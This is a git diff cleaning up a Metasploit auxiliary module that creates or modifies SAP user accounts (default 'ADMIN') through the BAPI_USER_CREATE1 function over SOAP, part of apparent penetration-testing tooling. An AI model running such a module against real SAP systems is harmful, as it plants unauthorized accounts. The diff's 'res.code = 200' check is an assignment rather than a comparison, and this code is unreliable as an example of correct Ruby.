diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 682e9717ee..9f8fb3f809 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -6,13 +6,13 @@ ## ## -# This module is based on, inspired by, or is a port of a plugin available in -# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. -# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and -# experience - a very cool guy. I'd also like to thank Chris John Riley, -# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and # provided excellent feedback. Some people just seem to enjoy hacking SAP :) ## @@ -23,16 +23,15 @@ class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1', - 'Version' => '$Revision$', 'Description' => %q{ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The module can be used for creating/modifying users. }, - 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], + 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'Author' => ['Agnivesh Sathasivam','nmonkee'], 'License' => BSD_LICENSE ) @@ -46,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary OptString.new('BAPI_USER',[false,'Username for the account (Usrename in upper case only. Default is ADMIN)', 'ADMIN']) ], self.class) end - + def run_host(ip) data = '' data << '' @@ -75,10 +74,10 @@ class Metasploit4 < Msf::Auxiliary 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'Authorization' => 'Basic ' + user_pass, - 'Content-Type' => 'text/xml; charset=UTF-8', + 'Content-Type' => 'text/xml; charset=UTF-8' } }, 45) - if res.code = 200 + if res and res.code = 200 if res.body =~ /

Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - Logon failed") elsif res.body =~ /faultstring/ @@ -89,9 +88,8 @@ class Metasploit4 < Msf::Auxiliary print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created") end else - print_error("[SAP] #{ip}:#{rport} - Couldn't access " + ip + ":" + port ) - print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) - print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) + print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res + print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect")